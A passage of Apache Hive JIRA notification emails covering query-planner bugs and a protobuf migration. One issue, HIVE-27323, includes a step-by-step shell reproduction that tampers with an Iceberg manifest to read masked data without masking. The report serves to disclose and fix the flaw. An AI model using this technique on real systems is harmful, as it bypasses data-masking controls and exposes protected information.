~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.pretty.SqlPrettyWriter.list(SqlPrettyWriter.java:1068) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at 
org.apache.calcite.sql.SqlSelectOperator.unparse(SqlSelectOperator.java:164) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlSelect.unparse(SqlSelect.java:246) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:152) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:174) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:183) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.CalcitePlanner.getOptimizedSql(CalcitePlanner.java:1367) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.CalcitePlanner.genOPTree(CalcitePlanner.java:660) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.SemanticAnalyzer.analyzeInternal(SemanticAnalyzer.java:13113) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.hadoop.hive.ql.parse.CalcitePlanner.analyzeInternal(CalcitePlanner.java:465)
[jira] [Created] (HIVE-27919) Constant reduction in CBO does not work for FROM_UNIXTIME, DATE_ADD, DATE_SUB
Stamatis Zampetakis created HIVE-27919: -- Summary: Constant reduction in CBO does not work for FROM_UNIXTIME, DATE_ADD, DATE_SUB Key: HIVE-27919 URL: https://issues.apache.org/jira/browse/HIVE-27919 Project: Hive Issue Type: Improvement Components: CBO Affects Versions: 4.0.0-beta-1 Reporter: Stamatis Zampetakis Assignee: Stamatis Zampetakis Constant reduction (aka. constant folding) does not work in CBO for FROM_UNIXTIME, DATE_ADD, and DATE_SUB functions. Below, we outline the result of EXPLAIN CBO and plain EXPLAIN using some trivial constant inputs. Notice, that constant reduction is not present in the CBO plan but it is applied later on by the physical optimizer. {code:sql} SELECT FROM_UNIXTIME(1701088643) {code} {noformat} CBO PLAN: HiveProject(_o__c0=[FROM_UNIXTIME(1701088643)]) HiveTableScan(table=[[_dummy_database, _dummy_table]], table:alias=[_dummy_table]) STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: _dummy_table Row Limit Per Split: 1 Select Operator expressions: '2023-11-27 04:37:23' (type: string) outputColumnNames: _col0 ListSink {noformat} {code:sql} SELECT DATE_ADD('2023-01-01', 1) {code} {noformat} CBO PLAN: HiveProject(_o__c0=[DATE_ADD(_UTF-16LE'2023-01-01':VARCHAR(2147483647) CHARACTER SET "UTF-16LE", 1)]) HiveTableScan(table=[[_dummy_database, _dummy_table]], table:alias=[_dummy_table]) STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: _dummy_table Row Limit Per Split: 1 Select Operator expressions: DATE'2023-01-02' (type: date) outputColumnNames: _col0 ListSink {noformat} {code:sql} SELECT DATE_SUB('2023-01-01', 1) {code} {noformat} CBO PLAN: HiveProject(_o__c0=[DATE_SUB(_UTF-16LE'2023-01-01':VARCHAR(2147483647) CHARACTER SET "UTF-16LE", 1)]) HiveTableScan(table=[[_dummy_database, _dummy_table]], table:alias=[_dummy_table]) STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: _dummy_table Row Limit Per Split: 1 Select Operator 
expressions: DATE'2022-12-31' (type: date) outputColumnNames: _col0 ListSink {noformat} The reason is that all of these functions currently extend {{SqlAbstractTimeFunction}}, which is declared as a dynamic function and by default prevents constant folding. -- This message was sent by Atlassian Jira (v8.20.10#820010)
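The constant reduction the CBO is expected to perform can be reproduced directly. This is an illustrative Python sketch of the folded values, not Hive code; note that FROM_UNIXTIME is rendered here in UTC, whereas Hive uses the session time zone (hence the `2023-11-27 04:37:23` in the plan above corresponds to a UTC-8 session).

```python
# Folding the three constant expressions by hand (illustrative sketch).
from datetime import datetime, timedelta, timezone

# FROM_UNIXTIME(1701088643), rendered in UTC here.
from_unixtime = datetime.fromtimestamp(1701088643, tz=timezone.utc)
print(from_unixtime.strftime('%Y-%m-%d %H:%M:%S'))  # 2023-11-27 12:37:23

# DATE_ADD('2023-01-01', 1)
date_add = datetime.strptime('2023-01-01', '%Y-%m-%d') + timedelta(days=1)
print(date_add.date())  # 2023-01-02

# DATE_SUB('2023-01-01', 1)
date_sub = datetime.strptime('2023-01-01', '%Y-%m-%d') - timedelta(days=1)
print(date_sub.date())  # 2022-12-31
```

These are exactly the literals the physical optimizer eventually produces; the point of the issue is that the CBO plan should already contain them.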
[jira] [Updated] (HIVE-1626) stop using java.util.Stack
[ https://issues.apache.org/jira/browse/HIVE-1626?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chunhui Yang updated HIVE-1626: --- Description: We currently use Stack as part of the generic node walking library. Stack should not be used for this since its inheritance from Vector incurs superfluous synchronization overhead. Most projects end up adding an ArrayStack implementation and using that instead. was: We currently use Stack as part of the generic node walking library. Stack should not be used for this since its inheritance from Vector incurs superfluous synchronization overhead. Most projects end up adding an ArrayStack implementation and using that instead. > stop using java.util.Stack > -- > > Key: HIVE-1626 > URL: https://issues.apache.org/jira/browse/HIVE-1626 > Project: Hive > Issue Type: Improvement > Components: Query Processor >Affects Versions: 0.7.0 >Reporter: John Sichi >Assignee: Teddy Choi >Priority: Major > Labels: pull-request-available > Attachments: HIVE-1626.2.patch, HIVE-1626.2.patch, HIVE-1626.3.patch, > HIVE-1626.3.patch, HIVE-1626.3.patch > > Time Spent: 2h 40m > Remaining Estimate: 0h > > We currently use Stack as part of the generic node walking library. Stack should not be used for this since its inheritance from Vector incurs superfluous synchronization overhead. > Most projects end up adding an ArrayStack implementation and using that instead. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin
[ https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791647#comment-17791647 ] Stamatis Zampetakis commented on HIVE-27658: For convenience, the query in [^hive27658.q] is presented below. {code:sql} SELECT TC.CONST_DATE, TB.PRODUCT_SK FROM TABLE_A TA INNER JOIN (SELECT TO_DATE(FROM_UNIXTIME(1701088643)) AS CONST_DATE) TC ON TA.START_DATE = TC.CONST_DATE INNER JOIN TABLE_B TB ON TB.START_DATE = TC.CONST_DATE AND TA.PRODUCT_ID = TB.PRODUCT_ID;{code} The operator tree before hitting the error described above is depicted in [^hive27658-query-plan.pdf]. The problem is triggered while trying to convert the JOIN[14] operator into a dynamic partition hash join. The dynamic partition hash join is the first operator that appears in a Reduce Operator Tree and the plan usually looks like the snippet below. {noformat} Reduce Operator Tree: Map Join Operator condition map: Inner Join 0 to 1 keys: 0 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint) 1 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint) outputColumnNames: _col2, _col5, _col7, _col9, _col15 input vertices: 0 Map 1 Statistics: Num rows: 1178531569624 Data size: 414666308907440 Basic stats: COMPLETE Column stats: COMPLETE DynamicPartitionHashJoin: true {noformat} Observe that the column names for the keys are using the "KEY.reducesinkkey" prefix and the implementation depends on this naming convention for working properly. The {{ExprNodeDescUtils#resolveJoinKeysAsRSColumns}} method tries to map the join keys to the output column names from the RS operators using the {{columnExprMap}} mapping that is present on the RS operators. In this case, it fails to resolve the "0 _col1 (type:int), _col2 (type: date)" keys from the RS[12] operator because "_col2 (type: date)" is not present in the {{columnExprMap}} of RS[12] thus it returns {{null}} and triggers the aforementioned exception. 
Looking closer at RS[12] we can see that there is a slight inconsistency between the columnExprMap and the key expressions. The KEY.reducesinkkey1 denotes that the input expression is a constant date but this is not reflected in the key expressions where _col2 is an expression referencing a column. It appears the constant propagation logic did not trigger completely for RS[12], leaving it in an intermediate state that is problematic for the dynamic partition hash join conversion. > Error resolving join keys during conversion to dynamic partition hashjoin > - > > Key: HIVE-27658 > URL: https://issues.apache.org/jira/browse/HIVE-27658 > Project: Hive > Issue Type: Bug > Components: Query Planning >Affects Versions: 3.1.3, 4.0.0-beta-1 >Reporter: xiaojunxiang >Priority: Major > Attachments: hive27658-query-plan.pdf, hive27658.q > > > In certain cases the compilation of queries fails during the conversion to a > dynamic partition hash join with a stacktrace similar to the one shown > below. > {noformat} > 2023-08-31T10:22:21,738 WARN [HiveServer2-Handler-Pool: Thread-100]: > thrift.ThriftCLIService (()) - Error executing statement: > org.apache.hive.service.cli.HiveSQLException: Error while compiling > statement: FAILED: SemanticException Error resolving join keys > at > org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541) > ~[hive-service-100.jar:?] 
> at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557) > ~[hive-exec-100.jar:?] > at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542) > ~[hive-exec-100.jar:?] > at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) >
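The resolution failure described in the comment above can be sketched in miniature. This is a simplified Python model with assumed names (not Hive's real `ExprNodeDescUtils#resolveJoinKeysAsRSColumns` data structures): join keys are mapped to ReduceSink output columns through a columnExprMap, and a key expression missing from the map makes resolution return nothing, which is what triggers the SemanticException.

```python
# Simplified model (assumed names, not Hive's real data structures) of
# resolving join key expressions against an RS operator's columnExprMap.
def resolve_join_keys(keys, column_expr_map):
    resolved = []
    for key in keys:
        # Find the RS output column whose mapped expression equals the key.
        matches = [col for col, expr in column_expr_map.items() if expr == key]
        if not matches:
            return None  # analogous to "SemanticException Error resolving join keys"
        resolved.append(matches[0])
    return resolved

# Consistent RS: both key expressions appear in the map -> resolution succeeds.
ok_map = {'KEY.reducesinkkey0': '_col1', 'KEY.reducesinkkey1': '_col2'}
print(resolve_join_keys(['_col1', '_col2'], ok_map))

# Inconsistent RS (as described for RS[12]): the map holds a folded constant
# for reducesinkkey1 while the key list still references _col2 -> failure.
bad_map = {'KEY.reducesinkkey0': '_col1', 'KEY.reducesinkkey1': "DATE'2023-11-27'"}
print(resolve_join_keys(['_col1', '_col2'], bad_map))
```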
[jira] [Updated] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin
[ https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Stamatis Zampetakis updated HIVE-27658: --- Attachment: hive27658-query-plan.pdf > Error resolving join keys during conversion to dynamic partition hashjoin > - > > Key: HIVE-27658 > URL: https://issues.apache.org/jira/browse/HIVE-27658 > Project: Hive > Issue Type: Bug > Components: Query Planning >Affects Versions: 3.1.3, 4.0.0-beta-1 >Reporter: xiaojunxiang >Priority: Major > Attachments: hive27658-query-plan.pdf, hive27658.q > > > In certain cases the compilation of queries fail during the conversion to a > dynamic partition hash join with the stacktrace similar to the one shown > below. > {noformat} > 2023-08-31T10:22:21,738 WARN [HiveServer2-Handler-Pool: Thread-100]: > thrift.ThriftCLIService (()) - Error executing statement: > org.apache.hive.service.cli.HiveSQLException: Error while compiling > statement: FAILED: SemanticException Error resolving join keys > at > org.apache.hive.service.cli.operation.Operation.toSQLException(Operation.java:335) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.prepare(SQLOperation.java:199) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.SQLOperation.runInternal(SQLOperation.java:260) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.operation.Operation.run(Operation.java:247) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementInternal(HiveSessionImpl.java:541) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.session.HiveSessionImpl.executeStatementAsync(HiveSessionImpl.java:527) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.CLIService.executeStatementAsync(CLIService.java:312) > ~[hive-service-100.jar:?] > at > org.apache.hive.service.cli.thrift.ThriftCLIService.ExecuteStatement(ThriftCLIService.java:562) > ~[hive-service-100.jar:?] 
> at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1557) > ~[hive-exec-100.jar:?] > at > org.apache.hive.service.rpc.thrift.TCLIService$Processor$ExecuteStatement.getResult(TCLIService.java:1542) > ~[hive-exec-100.jar:?] > at org.apache.thrift.ProcessFunction.process(ProcessFunction.java:39) > ~[hive-exec-100.jar:?] > at org.apache.thrift.TBaseProcessor.process(TBaseProcessor.java:39) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.metastore.security.HadoopThriftAuthBridge$Server$TUGIAssumingProcessor.process(HadoopThriftAuthBridge.java:647) > ~[hive-exec-100.jar:?] > at > org.apache.thrift.server.TThreadPoolServer$WorkerProcess.run(TThreadPoolServer.java:286) > ~[hive-exec-100.jar:?] > at > java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) > ~[?:1.8.0_312] > at > java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) > ~[?:1.8.0_312] > at java.lang.Thread.run(Thread.java:748) [?:1.8.0_312] > Caused by: org.apache.hadoop.hive.ql.parse.SemanticException: Error resolving > join keys > at > org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.getMapJoinDesc(MapJoinProcessor.java:1105) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.MapJoinProcessor.convertJoinOpMapJoinOp(MapJoinProcessor.java:372) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinMapJoin(ConvertJoinMapJoin.java:1056) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.convertJoinDynamicPartitionedHashJoin(ConvertJoinMapJoin.java:1280) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.fallbackToReduceSideJoin(ConvertJoinMapJoin.java:1312) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.checkAndConvertSMBJoin(ConvertJoinMapJoin.java:371) > ~[hive-exec-100.jar:?] 
> at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.process(ConvertJoinMapJoin.java:151) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.DefaultRuleDispatcher.dispatch(DefaultRuleDispatcher.java:90) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatchAndReturn(DefaultGraphWalker.java:105) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatch(DefaultGraphWalker.java:89) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.ForwardWalker.walk(ForwardWalker.java:74) > ~[hive-exec-100.jar:?] > at >
[jira] [Assigned] (HIVE-26505) Case When Some result data is lost when there are common column conditions and partitioned column conditions
[ https://issues.apache.org/jira/browse/HIVE-26505?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Krisztian Kasa reassigned HIVE-26505: - Assignee: Krisztian Kasa > Case When Some result data is lost when there are common column conditions > and partitioned column conditions > - > > Key: HIVE-26505 > URL: https://issues.apache.org/jira/browse/HIVE-26505 > Project: Hive > Issue Type: Bug > Components: Hive >Affects Versions: 3.1.0, 4.0.0-alpha-1 >Reporter: GuangMing Lu >Assignee: Krisztian Kasa >Priority: Critical > Labels: check, hive-4.0.0-must > > {code:java}https://issues.apache.org/jira/browse/HIVE-26505# > create table test0831 (id string) partitioned by (cp string); > insert into test0831 values ('a', '2022-08-23'),('c', '2022-08-23'),('d', > '2022-08-23'); > insert into test0831 values ('a', '2022-08-24'),('b', '2022-08-24'); > select * from test0831; > +-+--+ > | test0831.id | test0831.cp | > +-+--+ > | a | 2022-08-23 | > | b | 2022-08-23 | > | a | 2022-08-23 | > | c | 2022-08-24 | > | d | 2022-08-24 | > +-+--+ > select * from test0831 where (case when id='a' and cp='2022-08-23' then 1 > else 0 end)=0; > +--+--+ > | test0830.id | test0830.cp | > +--+--+ > | a | 2022-08-24 | > | b | 2022-08-24 | > +--+--+ > {code} > -- This message was sent by Atlassian Jira (v8.20.10#820010)
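Evaluating the CASE WHEN filter by hand over the inserted rows shows the expected result. This is an illustrative Python check, not Hive code; the point is that the expression itself is straightforward, and the missing rows come from how Hive splits the condition into partition-column and ordinary-column parts.

```python
# Reproducing the expected result of the CASE WHEN filter in plain Python
# (illustrative; the bug lies in Hive's handling of mixed partition and
# non-partition column conditions, not in the expression itself).
rows = [('a', '2022-08-23'), ('c', '2022-08-23'), ('d', '2022-08-23'),
        ('a', '2022-08-24'), ('b', '2022-08-24')]

def case_when(row_id, cp):
    # CASE WHEN id='a' AND cp='2022-08-23' THEN 1 ELSE 0 END
    return 1 if (row_id == 'a' and cp == '2022-08-23') else 0

result = [r for r in rows if case_when(*r) == 0]
print(result)
# Four rows are expected (everything except ('a', '2022-08-23')), while the
# reported query returns only two.
```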
[jira] [Commented] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97
[ https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791618#comment-17791618 ] Denys Kuzmenko commented on HIVE-27269: --- Merged to master. [~seonggon], thank you for the patch! > VectorizedMapJoin returns wrong result for TPC-DS query 97 > -- > > Key: HIVE-27269 > URL: https://issues.apache.org/jira/browse/HIVE-27269 > Project: Hive > Issue Type: Sub-task >Reporter: Seonggon Namgung >Assignee: Seonggon Namgung >Priority: Critical > Labels: hive-4.0.0-must, pull-request-available > > TPC-DS query 97 returns wrong results when hive.auto.convert.join and > hive.vectorized.execution.enabled are set to true. > > Result of query 97 on 1TB text dataset: > CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, > 284185{*}746{*}, 84163 > MapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163 > VectorMapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163 > > Also I observed that VectorizedMapJoin returns different results for 100GB > dataset when I run query 97 twice, but I could not reproduce it since then. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97
[ https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27269: -- Fix Version/s: 4.0.0 Resolution: Fixed Status: Resolved (was: Patch Available) > VectorizedMapJoin returns wrong result for TPC-DS query 97 > -- > > Key: HIVE-27269 > URL: https://issues.apache.org/jira/browse/HIVE-27269 > Project: Hive > Issue Type: Sub-task >Reporter: Seonggon Namgung >Assignee: Seonggon Namgung >Priority: Critical > Labels: hive-4.0.0-must, pull-request-available > Fix For: 4.0.0 > > > TPC-DS query 97 returns wrong results when hive.auto.convert.join and > hive.vectorized.execution.enabled are set to true. > > Result of query 97 on 1TB text dataset: > CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, > 284185{*}746{*}, 84163 > MapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163 > VectorMapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163 > > Also I observed that VectorizedMapJoin returns different results for 100GB > dataset when I run query 97 twice, but I could not reproduce it since then. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27506) Migrate to ProtobufRpcEngine2
[ https://issues.apache.org/jira/browse/HIVE-27506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791603#comment-17791603 ] Ayush Saxena commented on HIVE-27506: - [~kanaka] I don't think that is anywhere in the plan. To use ProtobufRpcEngine2 we need the third-party (shaded) protobuf as well, so I don't think that is happening anytime soon. > Migrate to ProtobufRpcEngine2 > - > > Key: HIVE-27506 > URL: https://issues.apache.org/jira/browse/HIVE-27506 > Project: Hive > Issue Type: Task > Components: llap >Reporter: Ashok Kumar >Priority: Major > > Hadoop has moved over from protobuf 2.5.0 to the Hadoop shaded protobuf. > It has created > [ProtobufRpcEngine2|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine2.java] > for this purpose. > Hive llap still uses > [ProtobufRpcEngine|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine.java], > which is meant for protobuf 2.5.0, e.g. > [Ref#|https://github.com/apache/hive/blob/bd02abc9eba3aa0cd3701b26d9169130551a12ef/llap-common/src/java/org/apache/hadoop/hive/llap/LlapUtil.java#L267] > This Jira is to update the Hive llap codebase to use ProtobufRpcEngine2. -- This message was sent by Atlassian Jira (v8.20.10#820010)
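For readers unfamiliar with the mechanics, the migration discussed above amounts to changing which RPC engine class is registered for a protocol interface before client proxies or servers are built. The following self-contained sketch only mimics the shape of Hadoop's per-protocol engine registration (`RPC.setProtocolEngine`); the classes, the map-based registry, and the `LlapProtocolPB` name are stand-ins for illustration, not the real Hadoop or Hive API.

```java
import java.util.HashMap;
import java.util.Map;

public class RpcEngineSketch {
    interface RpcEngine { String name(); }
    // Stand-ins for Hadoop's ProtobufRpcEngine (protobuf 2.5.0) and
    // ProtobufRpcEngine2 (shaded third-party protobuf). Not the real classes.
    static class ProtobufRpcEngine implements RpcEngine {
        public String name() { return "ProtobufRpcEngine"; }
    }
    static class ProtobufRpcEngine2 implements RpcEngine {
        public String name() { return "ProtobufRpcEngine2"; }
    }

    // Hadoop keys the engine off the protocol interface in the Configuration;
    // a plain map plays that role in this sketch.
    static final Map<Class<?>, RpcEngine> ENGINES = new HashMap<>();
    static void setProtocolEngine(Class<?> protocol, RpcEngine engine) {
        ENGINES.put(protocol, engine);
    }

    // Stand-in for an LLAP protocol interface.
    interface LlapProtocolPB {}

    public static void main(String[] args) {
        // Before: the protobuf-2.5 engine is registered for the protocol.
        setProtocolEngine(LlapProtocolPB.class, new ProtobufRpcEngine());
        // The migration in this ticket amounts to switching the registered engine:
        setProtocolEngine(LlapProtocolPB.class, new ProtobufRpcEngine2());
        System.out.println(ENGINES.get(LlapProtocolPB.class).name());
    }
}
```

The point of the comment above is that the switch is not purely mechanical: the message types handled by ProtobufRpcEngine2 come from the shaded third-party protobuf, so the generated protocol classes must move to that dependency too.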
[jira] [Updated] (HIVE-27323) Iceberg: malformed manifest file or list can cause data breach
[ https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27323: -- Labels: check pull-request-available (was: check) > Iceberg: malformed manifest file or list can cause data breach > -- > > Key: HIVE-27323 > URL: https://issues.apache.org/jira/browse/HIVE-27323 > Project: Hive > Issue Type: Bug > Components: Iceberg integration >Affects Versions: 4.0.0-alpha-2 >Reporter: Janos Kovacs >Priority: Blocker > Labels: check, pull-request-available > > Set to bug/blocker instead of enhancement due to its security-related nature; > Hive4 should not be released w/o a fix for this. Please reset if needed. > > FYI: it's similar to HIVE-27322, but this one is based on Iceberg's internals > and can't just be fixed via the storagehandler authorizer. > > Context: > * There are some core tables with sensitive data that users can only query > with data masking enforced (e.g. via Ranger). Let's assume this is the > `default.icebergsecured` table. > * An end-user can only access the masked form of the sensitive data, as > expected... > * The users also have the privilege to create new tables in their own sandbox > databases - let's assume this is the `default.trojanhorse` table for now. > * The user can create a malicious table that exposes the sensitive data > non-masked, leading to a possible data breach. 
> * Hive runs with doAs=false to be able to enforce FGAC and avoid end-users > needing direct file-system access > Repro: > * First make sure the data is secured by the masking policy: > {noformat} > > beeline -e " > DROP TABLE IF EXISTS default.icebergsecured PURGE; > CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) > STORED BY ICEBERG; > INSERT INTO default.icebergsecured VALUES ('You might be allowed to see > this.','You are NOT allowed to see this!'); > " > > beeline -e " > SELECT * FROM default.icebergsecured; > " > +++ > | icebergsecured.txt | icebergsecured.secret | > +++ > | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY | > +++ > {noformat} > * Now let the user create the malicious table exposing the sensitive data: > {noformat} > > beeline -e " > DROP TABLE IF EXISTS default.trojanhorseviadata; > CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) > STORED BY ICEBERG > LOCATION '/some-user-writeable-location/trojanhorseviadata'; > INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder'); > " > SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" > beeline --outputformat=csv2 --showHeader=false --verbose=false > --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM > default.icebergsecured.files;" 2>/dev/null) > TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" > beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null > |grep metadata_location |grep -v previous_metadata_location | awk '{print > $5}') > TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep > "manifest-list" |cut -f4 -d\") > hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION > TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION) > TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq > '.manifest_path' |tr -d \") > hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION > 
TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION) > mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig > avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp > "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json > avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > > ${TROJAN_MANIFESTFILE}.schema > avro-tools fromjson --codec deflate --schema-file > ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > > ${TROJAN_MANIFESTFILE}.new > hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION > beeline -e "SELECT * FROM default.trojanhorseviadata;" > ++---+ > | trojanhorseviadata.txt | trojanhorseviadata.secret | > ++---+ > | You might be allowed to see this. | You are not allowed to see this! | > ++---+ > {noformat} > > There are actually multiple options to create such table and modify the > manifest/list like
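One possible mitigation for the attack sketched above (a hypothetical illustration, not the actual Hive/Iceberg fix) is to validate that every data file referenced by a manifest resolves under the table's own location, so a tampered manifest cannot point the scan at another table's files. The method name and check below are assumptions for the sketch:

```java
import java.net.URI;

public class ManifestPathCheckSketch {
    // Hypothetical guard: accept a manifest entry only when its data file
    // path sits under the table location. Normalization defends against
    // ".." escapes such as /warehouse/t/../icebergsecured/data/secret.orc.
    static boolean isUnderTableLocation(String tableLocation, String dataFilePath) {
        String table = URI.create(tableLocation).normalize().getPath();
        String file = URI.create(dataFilePath).normalize().getPath();
        if (!table.endsWith("/")) {
            table = table + "/";
        }
        return file.startsWith(table);
    }

    public static void main(String[] args) {
        // A file belonging to the trojan table itself passes:
        System.out.println(isUnderTableLocation(
                "/some-user-writeable-location/trojanhorseviadata",
                "/some-user-writeable-location/trojanhorseviadata/data/f1.orc")); // true
        // The rewritten file_path pointing at the secured table is rejected:
        System.out.println(isUnderTableLocation(
                "/some-user-writeable-location/trojanhorseviadata",
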